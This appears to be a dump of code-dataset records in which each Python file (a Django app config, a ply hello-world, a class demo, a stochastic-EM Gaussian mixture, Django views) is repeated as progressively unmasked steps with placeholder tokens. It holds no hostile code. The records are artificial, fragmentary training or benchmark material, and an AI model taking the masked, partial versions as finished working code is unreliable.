p.add_tools(HoverTool(tooltips=[(\"Type\", \"@x\"), (\"Count\", \"@counts\")]))\n\n return(p)\n\n\n#summary = read_summary(\"PT19DW.5.json\")\nsummary = read_summary(\"PT19DW.7.json\")\n\noutput_file(\"totals.html\", title=\"Totals\")\ntotals = plot_totals(summary)\n\nshow(totals)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from django.apps import AppConfig
class BoletoGerenciaNetConfig(AppConfig):
name = 'boletogerencianet'
|
normal
|
{
"blob_id": "c2069113f322c97e953fba6b9d21b90a8b13a066",
"index": 2308,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass BoletoGerenciaNetConfig(AppConfig):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass BoletoGerenciaNetConfig(AppConfig):\n name = 'boletogerencianet'\n",
"step-4": "from django.apps import AppConfig\n\n\nclass BoletoGerenciaNetConfig(AppConfig):\n name = 'boletogerencianet'\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import ply.lex as lex
print("hello word!")
|
normal
|
{
"blob_id": "84d0c439fcee4339250ced11dd2264740cc20d9c",
"index": 9567,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('hello word!')\n",
"step-3": "import ply.lex as lex\nprint('hello word!')\n",
"step-4": "import ply.lex as lex\n\nprint(\"hello word!\")\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
class MyClass:
name = "alice"
def set_name(self, name):
self.name = name
def get_name(self):
return self.name
def say_hello(self):
self.greet = "Hello"
def say_hi(self):
print("HI~~~~~")
p1 = MyClass()
p2 = MyClass()
print(p1.name)
p1.set_name("bob")
print(p1.name)
print(p2.name)
# 인스턴스 멤버를 적용한후에 그 인스턴스 멤버에 접근 할 수 있다
p1.say_hello()
print(p1.greet)
#클래스 메서드를 클래스. 으로 호출 했기 떄문에 self 파라미터를 하나 넘겨 줘야 한다
MyClass.say_hi("gg")
|
normal
|
{
"blob_id": "babb5ac680c74e19db5c86c2c3323e8285d169ff",
"index": 9939,
"step-1": "class MyClass:\n <mask token>\n\n def set_name(self, name):\n self.name = name\n\n def get_name(self):\n return self.name\n\n def say_hello(self):\n self.greet = 'Hello'\n\n def say_hi(self):\n print('HI~~~~~')\n\n\n<mask token>\n",
"step-2": "class MyClass:\n name = 'alice'\n\n def set_name(self, name):\n self.name = name\n\n def get_name(self):\n return self.name\n\n def say_hello(self):\n self.greet = 'Hello'\n\n def say_hi(self):\n print('HI~~~~~')\n\n\n<mask token>\n",
"step-3": "class MyClass:\n name = 'alice'\n\n def set_name(self, name):\n self.name = name\n\n def get_name(self):\n return self.name\n\n def say_hello(self):\n self.greet = 'Hello'\n\n def say_hi(self):\n print('HI~~~~~')\n\n\n<mask token>\nprint(p1.name)\np1.set_name('bob')\nprint(p1.name)\nprint(p2.name)\np1.say_hello()\nprint(p1.greet)\nMyClass.say_hi('gg')\n",
"step-4": "class MyClass:\n name = 'alice'\n\n def set_name(self, name):\n self.name = name\n\n def get_name(self):\n return self.name\n\n def say_hello(self):\n self.greet = 'Hello'\n\n def say_hi(self):\n print('HI~~~~~')\n\n\np1 = MyClass()\np2 = MyClass()\nprint(p1.name)\np1.set_name('bob')\nprint(p1.name)\nprint(p2.name)\np1.say_hello()\nprint(p1.greet)\nMyClass.say_hi('gg')\n",
"step-5": "class MyClass:\n name = \"alice\"\n \n def set_name(self, name):\n self.name = name\n \n def get_name(self):\n return self.name\n \n def say_hello(self):\n self.greet = \"Hello\"\n \n def say_hi(self):\n print(\"HI~~~~~\")\n \n\n\np1 = MyClass()\np2 = MyClass()\n\nprint(p1.name)\np1.set_name(\"bob\")\nprint(p1.name)\n\nprint(p2.name)\n\n# 인스턴스 멤버를 적용한후에 그 인스턴스 멤버에 접근 할 수 있다\np1.say_hello()\nprint(p1.greet)\n\n#클래스 메서드를 클래스. 으로 호출 했기 떄문에 self 파라미터를 하나 넘겨 줘야 한다 \nMyClass.say_hi(\"gg\")\n\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
"""Gaussian mixture model, with Stochastic EM algorithm."""
import numpy as np
from sklearn.mixture.gaussian_mixture import _estimate_gaussian_parameters, _compute_precision_cholesky
from Core.gllim import MyGMM
class SEMGaussianMixture(MyGMM):
"""Remarque : on utilise la variable Y pour les observations, au lieu de X dans la classe parente."""
def _compute_Z_conditionnal_density(self,Y):
"""
Calcule les proba conditionnelles de Z_i sachant Y_i
:param Y: Observations (n_samples,n_features)
:return: matrice stochastique (en ligne) (n_samples,n_components)
"""
proba_cond = np.exp(self._estimate_weighted_log_prob(Y)) # Pi_k * g_k(yi)
s = proba_cond.sum(axis=1)[:,np.newaxis] # sum_k (Pi_k * g_k(yi))
return proba_cond / s #On normalise
def _draw_conditionnal_Z(self,Y):
"""
Tire un échantillon de loi Z sachant Y
:param Y: Observations (n_samples, n_features)
:return: Z (n_samples,n_components) Zik = 1 ssi Zi vaut ek
"""
M = self._compute_Z_conditionnal_density(Y)
s = M.cumsum(axis=1)
r = np.random.rand(M.shape[0])[:,np.newaxis]
zi = (s < r).sum(axis=1)[:,np.newaxis]
I = np.empty(M.shape)
I[:] = np.arange(M.shape[1])
return (I == zi).astype(float)
def threshold(self,Z,n_features):
pik = Z.sum(axis=0)
return (pik >= (n_features + 1)).prod()
def _m_step(self, Y, log_resp):
"""M step.
Parameters
----------
Y : array-like, shape (n_samples, n_features)
log_resp : array-like, shape (n_samples, n_components)
Logarithm of the posterior probabilities (or responsibilities) of
the point of each sample in Y.
"""
Z = self._draw_conditionnal_Z(Y)
while not self.threshold(Z,Y.shape[1]): #Condition de seuil
Z = self._draw_conditionnal_Z(Y)
print("Ajustement au seuil")
n_samples, _ = Y.shape
self.weights_, self.means_, self.covariances_ = (
_estimate_gaussian_parameters(Y, Z, self.reg_covar,
self.covariance_type))
self.weights_ /= n_samples
self.precisions_cholesky_ = _compute_precision_cholesky(
self.covariances_, self.covariance_type)
self._m_step_callback(Y)
class SAEMGaussianMixture(SEMGaussianMixture):
def _print_verbose_msg_iter_end(self, n_iter, diff_ll):
super()._print_verbose_msg_iter_end(n_iter,diff_ll)
self.current_iter = n_iter + 1 #Prochaine itération
def _m_step(self, Y, log_resp):
"""M step.
Parameters
----------
Y : array-like, shape (n_samples, n_features)
log_resp : array-like, shape (n_samples, n_components)
Logarithm of the posterior probabilities (or responsibilities) of
the point of each sample in Y.
"""
Z = self._draw_conditionnal_Z(Y)
i = 0
while i < 10 and not self.threshold(Z, Y.shape[1]): # Condition de seuil
Z = self._draw_conditionnal_Z(Y)
i += 1
print("Ajustement au seuil")
n_samples, _ = Y.shape
SEMweights_, SEMmeans_, SEMcovariances_ = (
_estimate_gaussian_parameters(Y, Z, self.reg_covar,
self.covariance_type))
SEMweights_ /= n_samples
EMweights_, EMmeans_, EMcovariances_ = (
_estimate_gaussian_parameters(Y, np.exp(log_resp), self.reg_covar,
self.covariance_type))
EMweights_ /= n_samples
r = self.current_iter
gr = self.gamma(r)
self.means_ = (1 - gr) * EMmeans_ + gr * SEMmeans_
self.weights_ = (1 - gr) * EMweights_ + gr * SEMweights_
self.covariances_ = (1 - gr) * EMcovariances_ + gr * SEMcovariances_
self.precisions_cholesky_ = _compute_precision_cholesky(
self.covariances_, self.covariance_type)
self._m_step_callback(Y)
@staticmethod
def gamma(r):
return 1 / np.sqrt( r + 1)
|
normal
|
{
"blob_id": "39475626b7e3e0f4c8143b300c002a2eb50cc23a",
"index": 9341,
"step-1": "<mask token>\n\n\nclass SEMGaussianMixture(MyGMM):\n <mask token>\n <mask token>\n\n def _draw_conditionnal_Z(self, Y):\n \"\"\"\n Tire un échantillon de loi Z sachant Y\n\n :param Y: Observations (n_samples, n_features)\n :return: Z (n_samples,n_components) Zik = 1 ssi Zi vaut ek\n \"\"\"\n M = self._compute_Z_conditionnal_density(Y)\n s = M.cumsum(axis=1)\n r = np.random.rand(M.shape[0])[:, np.newaxis]\n zi = (s < r).sum(axis=1)[:, np.newaxis]\n I = np.empty(M.shape)\n I[:] = np.arange(M.shape[1])\n return (I == zi).astype(float)\n\n def threshold(self, Z, n_features):\n pik = Z.sum(axis=0)\n return (pik >= n_features + 1).prod()\n\n def _m_step(self, Y, log_resp):\n \"\"\"M step.\n\n Parameters\n ----------\n Y : array-like, shape (n_samples, n_features)\n\n log_resp : array-like, shape (n_samples, n_components)\n Logarithm of the posterior probabilities (or responsibilities) of\n the point of each sample in Y.\n \"\"\"\n Z = self._draw_conditionnal_Z(Y)\n while not self.threshold(Z, Y.shape[1]):\n Z = self._draw_conditionnal_Z(Y)\n print('Ajustement au seuil')\n n_samples, _ = Y.shape\n self.weights_, self.means_, self.covariances_ = (\n _estimate_gaussian_parameters(Y, Z, self.reg_covar, self.\n covariance_type))\n self.weights_ /= n_samples\n self.precisions_cholesky_ = _compute_precision_cholesky(self.\n covariances_, self.covariance_type)\n self._m_step_callback(Y)\n\n\nclass SAEMGaussianMixture(SEMGaussianMixture):\n\n def _print_verbose_msg_iter_end(self, n_iter, diff_ll):\n super()._print_verbose_msg_iter_end(n_iter, diff_ll)\n self.current_iter = n_iter + 1\n\n def _m_step(self, Y, log_resp):\n \"\"\"M step.\n\n Parameters\n ----------\n Y : array-like, shape (n_samples, n_features)\n\n log_resp : array-like, shape (n_samples, n_components)\n Logarithm of the posterior probabilities (or responsibilities) of\n the point of each sample in Y.\n \"\"\"\n Z = self._draw_conditionnal_Z(Y)\n i = 0\n while i < 10 and not self.threshold(Z, Y.shape[1]):\n Z = self._draw_conditionnal_Z(Y)\n i += 1\n print('Ajustement au seuil')\n n_samples, _ = Y.shape\n SEMweights_, SEMmeans_, SEMcovariances_ = (\n _estimate_gaussian_parameters(Y, Z, self.reg_covar, self.\n covariance_type))\n SEMweights_ /= n_samples\n EMweights_, EMmeans_, EMcovariances_ = _estimate_gaussian_parameters(Y,\n np.exp(log_resp), self.reg_covar, self.covariance_type)\n EMweights_ /= n_samples\n r = self.current_iter\n gr = self.gamma(r)\n self.means_ = (1 - gr) * EMmeans_ + gr * SEMmeans_\n self.weights_ = (1 - gr) * EMweights_ + gr * SEMweights_\n self.covariances_ = (1 - gr) * EMcovariances_ + gr * SEMcovariances_\n self.precisions_cholesky_ = _compute_precision_cholesky(self.\n covariances_, self.covariance_type)\n self._m_step_callback(Y)\n\n @staticmethod\n def gamma(r):\n return 1 / np.sqrt(r + 1)\n",
"step-2": "<mask token>\n\n\nclass SEMGaussianMixture(MyGMM):\n <mask token>\n\n def _compute_Z_conditionnal_density(self, Y):\n \"\"\"\n Calcule les proba conditionnelles de Z_i sachant Y_i\n :param Y: Observations (n_samples,n_features)\n :return: matrice stochastique (en ligne) (n_samples,n_components)\n \"\"\"\n proba_cond = np.exp(self._estimate_weighted_log_prob(Y))\n s = proba_cond.sum(axis=1)[:, np.newaxis]\n return proba_cond / s\n\n def _draw_conditionnal_Z(self, Y):\n \"\"\"\n Tire un échantillon de loi Z sachant Y\n\n :param Y: Observations (n_samples, n_features)\n :return: Z (n_samples,n_components) Zik = 1 ssi Zi vaut ek\n \"\"\"\n M = self._compute_Z_conditionnal_density(Y)\n s = M.cumsum(axis=1)\n r = np.random.rand(M.shape[0])[:, np.newaxis]\n zi = (s < r).sum(axis=1)[:, np.newaxis]\n I = np.empty(M.shape)\n I[:] = np.arange(M.shape[1])\n return (I == zi).astype(float)\n\n def threshold(self, Z, n_features):\n pik = Z.sum(axis=0)\n return (pik >= n_features + 1).prod()\n\n def _m_step(self, Y, log_resp):\n \"\"\"M step.\n\n Parameters\n ----------\n Y : array-like, shape (n_samples, n_features)\n\n log_resp : array-like, shape (n_samples, n_components)\n Logarithm of the posterior probabilities (or responsibilities) of\n the point of each sample in Y.\n \"\"\"\n Z = self._draw_conditionnal_Z(Y)\n while not self.threshold(Z, Y.shape[1]):\n Z = self._draw_conditionnal_Z(Y)\n print('Ajustement au seuil')\n n_samples, _ = Y.shape\n self.weights_, self.means_, self.covariances_ = (\n _estimate_gaussian_parameters(Y, Z, self.reg_covar, self.\n covariance_type))\n self.weights_ /= n_samples\n self.precisions_cholesky_ = _compute_precision_cholesky(self.\n covariances_, self.covariance_type)\n self._m_step_callback(Y)\n\n\nclass SAEMGaussianMixture(SEMGaussianMixture):\n\n def _print_verbose_msg_iter_end(self, n_iter, diff_ll):\n super()._print_verbose_msg_iter_end(n_iter, diff_ll)\n self.current_iter = n_iter + 1\n\n def _m_step(self, Y, log_resp):\n \"\"\"M step.\n\n Parameters\n ----------\n Y : array-like, shape (n_samples, n_features)\n\n log_resp : array-like, shape (n_samples, n_components)\n Logarithm of the posterior probabilities (or responsibilities) of\n the point of each sample in Y.\n \"\"\"\n Z = self._draw_conditionnal_Z(Y)\n i = 0\n while i < 10 and not self.threshold(Z, Y.shape[1]):\n Z = self._draw_conditionnal_Z(Y)\n i += 1\n print('Ajustement au seuil')\n n_samples, _ = Y.shape\n SEMweights_, SEMmeans_, SEMcovariances_ = (\n _estimate_gaussian_parameters(Y, Z, self.reg_covar, self.\n covariance_type))\n SEMweights_ /= n_samples\n EMweights_, EMmeans_, EMcovariances_ = _estimate_gaussian_parameters(Y,\n np.exp(log_resp), self.reg_covar, self.covariance_type)\n EMweights_ /= n_samples\n r = self.current_iter\n gr = self.gamma(r)\n self.means_ = (1 - gr) * EMmeans_ + gr * SEMmeans_\n self.weights_ = (1 - gr) * EMweights_ + gr * SEMweights_\n self.covariances_ = (1 - gr) * EMcovariances_ + gr * SEMcovariances_\n self.precisions_cholesky_ = _compute_precision_cholesky(self.\n covariances_, self.covariance_type)\n self._m_step_callback(Y)\n\n @staticmethod\n def gamma(r):\n return 1 / np.sqrt(r + 1)\n",
"step-3": "<mask token>\n\n\nclass SEMGaussianMixture(MyGMM):\n \"\"\"Remarque : on utilise la variable Y pour les observations, au lieu de X dans la classe parente.\"\"\"\n\n def _compute_Z_conditionnal_density(self, Y):\n \"\"\"\n Calcule les proba conditionnelles de Z_i sachant Y_i\n :param Y: Observations (n_samples,n_features)\n :return: matrice stochastique (en ligne) (n_samples,n_components)\n \"\"\"\n proba_cond = np.exp(self._estimate_weighted_log_prob(Y))\n s = proba_cond.sum(axis=1)[:, np.newaxis]\n return proba_cond / s\n\n def _draw_conditionnal_Z(self, Y):\n \"\"\"\n Tire un échantillon de loi Z sachant Y\n\n :param Y: Observations (n_samples, n_features)\n :return: Z (n_samples,n_components) Zik = 1 ssi Zi vaut ek\n \"\"\"\n M = self._compute_Z_conditionnal_density(Y)\n s = M.cumsum(axis=1)\n r = np.random.rand(M.shape[0])[:, np.newaxis]\n zi = (s < r).sum(axis=1)[:, np.newaxis]\n I = np.empty(M.shape)\n I[:] = np.arange(M.shape[1])\n return (I == zi).astype(float)\n\n def threshold(self, Z, n_features):\n pik = Z.sum(axis=0)\n return (pik >= n_features + 1).prod()\n\n def _m_step(self, Y, log_resp):\n \"\"\"M step.\n\n Parameters\n ----------\n Y : array-like, shape (n_samples, n_features)\n\n log_resp : array-like, shape (n_samples, n_components)\n Logarithm of the posterior probabilities (or responsibilities) of\n the point of each sample in Y.\n \"\"\"\n Z = self._draw_conditionnal_Z(Y)\n while not self.threshold(Z, Y.shape[1]):\n Z = self._draw_conditionnal_Z(Y)\n print('Ajustement au seuil')\n n_samples, _ = Y.shape\n self.weights_, self.means_, self.covariances_ = (\n _estimate_gaussian_parameters(Y, Z, self.reg_covar, self.\n covariance_type))\n self.weights_ /= n_samples\n self.precisions_cholesky_ = _compute_precision_cholesky(self.\n covariances_, self.covariance_type)\n self._m_step_callback(Y)\n\n\nclass SAEMGaussianMixture(SEMGaussianMixture):\n\n def _print_verbose_msg_iter_end(self, n_iter, diff_ll):\n super()._print_verbose_msg_iter_end(n_iter, diff_ll)\n self.current_iter = n_iter + 1\n\n def _m_step(self, Y, log_resp):\n \"\"\"M step.\n\n Parameters\n ----------\n Y : array-like, shape (n_samples, n_features)\n\n log_resp : array-like, shape (n_samples, n_components)\n Logarithm of the posterior probabilities (or responsibilities) of\n the point of each sample in Y.\n \"\"\"\n Z = self._draw_conditionnal_Z(Y)\n i = 0\n while i < 10 and not self.threshold(Z, Y.shape[1]):\n Z = self._draw_conditionnal_Z(Y)\n i += 1\n print('Ajustement au seuil')\n n_samples, _ = Y.shape\n SEMweights_, SEMmeans_, SEMcovariances_ = (\n _estimate_gaussian_parameters(Y, Z, self.reg_covar, self.\n covariance_type))\n SEMweights_ /= n_samples\n EMweights_, EMmeans_, EMcovariances_ = _estimate_gaussian_parameters(Y,\n np.exp(log_resp), self.reg_covar, self.covariance_type)\n EMweights_ /= n_samples\n r = self.current_iter\n gr = self.gamma(r)\n self.means_ = (1 - gr) * EMmeans_ + gr * SEMmeans_\n self.weights_ = (1 - gr) * EMweights_ + gr * SEMweights_\n self.covariances_ = (1 - gr) * EMcovariances_ + gr * SEMcovariances_\n self.precisions_cholesky_ = _compute_precision_cholesky(self.\n covariances_, self.covariance_type)\n self._m_step_callback(Y)\n\n @staticmethod\n def gamma(r):\n return 1 / np.sqrt(r + 1)\n",
"step-4": "<mask token>\nimport numpy as np\nfrom sklearn.mixture.gaussian_mixture import _estimate_gaussian_parameters, _compute_precision_cholesky\nfrom Core.gllim import MyGMM\n\n\nclass SEMGaussianMixture(MyGMM):\n \"\"\"Remarque : on utilise la variable Y pour les observations, au lieu de X dans la classe parente.\"\"\"\n\n def _compute_Z_conditionnal_density(self, Y):\n \"\"\"\n Calcule les proba conditionnelles de Z_i sachant Y_i\n :param Y: Observations (n_samples,n_features)\n :return: matrice stochastique (en ligne) (n_samples,n_components)\n \"\"\"\n proba_cond = np.exp(self._estimate_weighted_log_prob(Y))\n s = proba_cond.sum(axis=1)[:, np.newaxis]\n return proba_cond / s\n\n def _draw_conditionnal_Z(self, Y):\n \"\"\"\n Tire un échantillon de loi Z sachant Y\n\n :param Y: Observations (n_samples, n_features)\n :return: Z (n_samples,n_components) Zik = 1 ssi Zi vaut ek\n \"\"\"\n M = self._compute_Z_conditionnal_density(Y)\n s = M.cumsum(axis=1)\n r = np.random.rand(M.shape[0])[:, np.newaxis]\n zi = (s < r).sum(axis=1)[:, np.newaxis]\n I = np.empty(M.shape)\n I[:] = np.arange(M.shape[1])\n return (I == zi).astype(float)\n\n def threshold(self, Z, n_features):\n pik = Z.sum(axis=0)\n return (pik >= n_features + 1).prod()\n\n def _m_step(self, Y, log_resp):\n \"\"\"M step.\n\n Parameters\n ----------\n Y : array-like, shape (n_samples, n_features)\n\n log_resp : array-like, shape (n_samples, n_components)\n Logarithm of the posterior probabilities (or responsibilities) of\n the point of each sample in Y.\n \"\"\"\n Z = self._draw_conditionnal_Z(Y)\n while not self.threshold(Z, Y.shape[1]):\n Z = self._draw_conditionnal_Z(Y)\n print('Ajustement au seuil')\n n_samples, _ = Y.shape\n self.weights_, self.means_, self.covariances_ = (\n _estimate_gaussian_parameters(Y, Z, self.reg_covar, self.\n covariance_type))\n self.weights_ /= n_samples\n self.precisions_cholesky_ = _compute_precision_cholesky(self.\n covariances_, self.covariance_type)\n self._m_step_callback(Y)\n\n\nclass SAEMGaussianMixture(SEMGaussianMixture):\n\n def _print_verbose_msg_iter_end(self, n_iter, diff_ll):\n super()._print_verbose_msg_iter_end(n_iter, diff_ll)\n self.current_iter = n_iter + 1\n\n def _m_step(self, Y, log_resp):\n \"\"\"M step.\n\n Parameters\n ----------\n Y : array-like, shape (n_samples, n_features)\n\n log_resp : array-like, shape (n_samples, n_components)\n Logarithm of the posterior probabilities (or responsibilities) of\n the point of each sample in Y.\n \"\"\"\n Z = self._draw_conditionnal_Z(Y)\n i = 0\n while i < 10 and not self.threshold(Z, Y.shape[1]):\n Z = self._draw_conditionnal_Z(Y)\n i += 1\n print('Ajustement au seuil')\n n_samples, _ = Y.shape\n SEMweights_, SEMmeans_, SEMcovariances_ = (\n _estimate_gaussian_parameters(Y, Z, self.reg_covar, self.\n covariance_type))\n SEMweights_ /= n_samples\n EMweights_, EMmeans_, EMcovariances_ = _estimate_gaussian_parameters(Y,\n np.exp(log_resp), self.reg_covar, self.covariance_type)\n EMweights_ /= n_samples\n r = self.current_iter\n gr = self.gamma(r)\n self.means_ = (1 - gr) * EMmeans_ + gr * SEMmeans_\n self.weights_ = (1 - gr) * EMweights_ + gr * SEMweights_\n self.covariances_ = (1 - gr) * EMcovariances_ + gr * SEMcovariances_\n self.precisions_cholesky_ = _compute_precision_cholesky(self.\n covariances_, self.covariance_type)\n self._m_step_callback(Y)\n\n @staticmethod\n def gamma(r):\n return 1 / np.sqrt(r + 1)\n",
"step-5": "\"\"\"Gaussian mixture model, with Stochastic EM algorithm.\"\"\"\n\nimport numpy as np\nfrom sklearn.mixture.gaussian_mixture import _estimate_gaussian_parameters, _compute_precision_cholesky\n\nfrom Core.gllim import MyGMM\n\n\nclass SEMGaussianMixture(MyGMM):\n \"\"\"Remarque : on utilise la variable Y pour les observations, au lieu de X dans la classe parente.\"\"\"\n\n def _compute_Z_conditionnal_density(self,Y):\n \"\"\"\n Calcule les proba conditionnelles de Z_i sachant Y_i\n :param Y: Observations (n_samples,n_features)\n :return: matrice stochastique (en ligne) (n_samples,n_components)\n \"\"\"\n proba_cond = np.exp(self._estimate_weighted_log_prob(Y)) # Pi_k * g_k(yi)\n s = proba_cond.sum(axis=1)[:,np.newaxis] # sum_k (Pi_k * g_k(yi))\n return proba_cond / s #On normalise\n\n def _draw_conditionnal_Z(self,Y):\n \"\"\"\n Tire un échantillon de loi Z sachant Y\n\n :param Y: Observations (n_samples, n_features)\n :return: Z (n_samples,n_components) Zik = 1 ssi Zi vaut ek\n \"\"\"\n M = self._compute_Z_conditionnal_density(Y)\n s = M.cumsum(axis=1)\n r = np.random.rand(M.shape[0])[:,np.newaxis]\n zi = (s < r).sum(axis=1)[:,np.newaxis]\n I = np.empty(M.shape)\n I[:] = np.arange(M.shape[1])\n return (I == zi).astype(float)\n\n def threshold(self,Z,n_features):\n pik = Z.sum(axis=0)\n return (pik >= (n_features + 1)).prod()\n\n def _m_step(self, Y, log_resp):\n \"\"\"M step.\n\n Parameters\n ----------\n Y : array-like, shape (n_samples, n_features)\n\n log_resp : array-like, shape (n_samples, n_components)\n Logarithm of the posterior probabilities (or responsibilities) of\n the point of each sample in Y.\n \"\"\"\n Z = self._draw_conditionnal_Z(Y)\n while not self.threshold(Z,Y.shape[1]): #Condition de seuil\n Z = self._draw_conditionnal_Z(Y)\n print(\"Ajustement au seuil\")\n\n n_samples, _ = Y.shape\n self.weights_, self.means_, self.covariances_ = (\n _estimate_gaussian_parameters(Y, Z, self.reg_covar,\n self.covariance_type))\n self.weights_ /= n_samples\n self.precisions_cholesky_ = _compute_precision_cholesky(\n self.covariances_, self.covariance_type)\n\n self._m_step_callback(Y)\n\nclass SAEMGaussianMixture(SEMGaussianMixture):\n\n def _print_verbose_msg_iter_end(self, n_iter, diff_ll):\n super()._print_verbose_msg_iter_end(n_iter,diff_ll)\n self.current_iter = n_iter + 1 #Prochaine itération\n\n def _m_step(self, Y, log_resp):\n \"\"\"M step.\n\n Parameters\n ----------\n Y : array-like, shape (n_samples, n_features)\n\n log_resp : array-like, shape (n_samples, n_components)\n Logarithm of the posterior probabilities (or responsibilities) of\n the point of each sample in Y.\n \"\"\"\n Z = self._draw_conditionnal_Z(Y)\n i = 0\n while i < 10 and not self.threshold(Z, Y.shape[1]): # Condition de seuil\n Z = self._draw_conditionnal_Z(Y)\n i += 1\n print(\"Ajustement au seuil\")\n\n n_samples, _ = Y.shape\n SEMweights_, SEMmeans_, SEMcovariances_ = (\n _estimate_gaussian_parameters(Y, Z, self.reg_covar,\n self.covariance_type))\n SEMweights_ /= n_samples\n\n EMweights_, EMmeans_, EMcovariances_ = (\n _estimate_gaussian_parameters(Y, np.exp(log_resp), self.reg_covar,\n self.covariance_type))\n EMweights_ /= n_samples\n\n r = self.current_iter\n gr = self.gamma(r)\n self.means_ = (1 - gr) * EMmeans_ + gr * SEMmeans_\n self.weights_ = (1 - gr) * EMweights_ + gr * SEMweights_\n self.covariances_ = (1 - gr) * EMcovariances_ + gr * SEMcovariances_\n\n self.precisions_cholesky_ = _compute_precision_cholesky(\n self.covariances_, self.covariance_type)\n\n self._m_step_callback(Y)\n\n @staticmethod\n def gamma(r):\n return 1 / np.sqrt( r + 1)\n\n",
"step-ids": [
8,
9,
10,
11,
12
]
}
|
[
8,
9,
10,
11,
12
] |
import pdb
from django.db.models import Count
from django.shortcuts import render_to_response, redirect
from django.contrib.auth.decorators import login_required
from django.contrib.contenttypes.models import ContentType
from django.template import RequestContext
from models import *
from forms import *
from django.http import HttpResponse
def list(request):
techniques = Technique.objects.annotate(num_images=Count('images')
).order_by('-num_images')
return render_to_response('technique/list.html', {'techniques':
techniques}, RequestContext(request))
def view(request, pk):
t = Technique.objects.get(pk=pk)
related = filter(lambda x: x, [t2 for t2 in t.starting_at.all()] + [t2 for
t2 in t.ending_at.all()] + [t2 for t2 in t.children.all()] + [t.
start, t.end])
return render_to_response('technique/view.html', {'t': t, 'related':
related}, RequestContext(request))
@login_required
def create(request, pk=None):
if pk:
t = Technique.objects.get(pk=pk)
else:
t = Technique(created_by=request.user)
if request.method == 'POST':
f = TechniqueForm(request.POST, instance=t)
image_formset = TechniqueImageFormset(request.POST, request.FILES,
instance=t)
if f.is_valid():
t = f.save(commit=False)
image_formset = TechniqueImageFormset(request.POST, request.
FILES, instance=t)
if image_formset.is_valid():
t.save()
for i in image_formset.save(commit=False):
i.created_by = request.user
i.technique = t
i.save()
return redirect(reverse('technique.views.view', args=(t.pk,)))
else:
f = TechniqueForm(instance=t)
image_formset = TechniqueImageFormset(instance=t)
return render_to_response('technique/create.html', {'f': f,
'image_formset': image_formset}, RequestContext(request))
|
normal
|
{
"blob_id": "565e994576a57f8bbdcb201f2439bd7e595fa53e",
"index": 9679,
"step-1": "<mask token>\n\n\ndef list(request):\n techniques = Technique.objects.annotate(num_images=Count('images')\n ).order_by('-num_images')\n return render_to_response('technique/list.html', {'techniques':\n techniques}, RequestContext(request))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef list(request):\n techniques = Technique.objects.annotate(num_images=Count('images')\n ).order_by('-num_images')\n return render_to_response('technique/list.html', {'techniques':\n techniques}, RequestContext(request))\n\n\ndef view(request, pk):\n t = Technique.objects.get(pk=pk)\n related = filter(lambda x: x, [t2 for t2 in t.starting_at.all()] + [t2 for\n t2 in t.ending_at.all()] + [t2 for t2 in t.children.all()] + [t.\n start, t.end])\n return render_to_response('technique/view.html', {'t': t, 'related':\n related}, RequestContext(request))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef list(request):\n techniques = Technique.objects.annotate(num_images=Count('images')\n ).order_by('-num_images')\n return render_to_response('technique/list.html', {'techniques':\n techniques}, RequestContext(request))\n\n\ndef view(request, pk):\n t = Technique.objects.get(pk=pk)\n related = filter(lambda x: x, [t2 for t2 in t.starting_at.all()] + [t2 for\n t2 in t.ending_at.all()] + [t2 for t2 in t.children.all()] + [t.\n start, t.end])\n return render_to_response('technique/view.html', {'t': t, 'related':\n related}, RequestContext(request))\n\n\n@login_required\ndef create(request, pk=None):\n if pk:\n t = Technique.objects.get(pk=pk)\n else:\n t = Technique(created_by=request.user)\n if request.method == 'POST':\n f = TechniqueForm(request.POST, instance=t)\n image_formset = TechniqueImageFormset(request.POST, request.FILES,\n instance=t)\n if f.is_valid():\n t = f.save(commit=False)\n image_formset = TechniqueImageFormset(request.POST, request.\n FILES, instance=t)\n if image_formset.is_valid():\n t.save()\n for i in image_formset.save(commit=False):\n i.created_by = request.user\n i.technique = t\n i.save()\n return redirect(reverse('technique.views.view', args=(t.pk,)))\n else:\n f = TechniqueForm(instance=t)\n image_formset = TechniqueImageFormset(instance=t)\n return render_to_response('technique/create.html', {'f': f,\n 'image_formset': image_formset}, RequestContext(request))\n",
"step-4": "import pdb\nfrom django.db.models import Count\nfrom django.shortcuts import render_to_response, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.template import RequestContext\nfrom models import *\nfrom forms import *\nfrom django.http import HttpResponse\n\n\ndef list(request):\n techniques = Technique.objects.annotate(num_images=Count('images')\n ).order_by('-num_images')\n return render_to_response('technique/list.html', {'techniques':\n techniques}, RequestContext(request))\n\n\ndef view(request, pk):\n t = Technique.objects.get(pk=pk)\n related = filter(lambda x: x, [t2 for t2 in t.starting_at.all()] + [t2 for\n t2 in t.ending_at.all()] + [t2 for t2 in t.children.all()] + [t.\n start, t.end])\n return render_to_response('technique/view.html', {'t': t, 'related':\n related}, RequestContext(request))\n\n\n@login_required\ndef create(request, pk=None):\n if pk:\n t = Technique.objects.get(pk=pk)\n else:\n t = Technique(created_by=request.user)\n if request.method == 'POST':\n f = TechniqueForm(request.POST, instance=t)\n image_formset = TechniqueImageFormset(request.POST, request.FILES,\n instance=t)\n if f.is_valid():\n t = f.save(commit=False)\n image_formset = TechniqueImageFormset(request.POST, request.\n FILES, instance=t)\n if image_formset.is_valid():\n t.save()\n for i in image_formset.save(commit=False):\n i.created_by = request.user\n i.technique = t\n i.save()\n return redirect(reverse('technique.views.view', args=(t.pk,)))\n else:\n f = TechniqueForm(instance=t)\n image_formset = TechniqueImageFormset(instance=t)\n return render_to_response('technique/create.html', {'f': f,\n 'image_formset': image_formset}, RequestContext(request))\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
# coding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
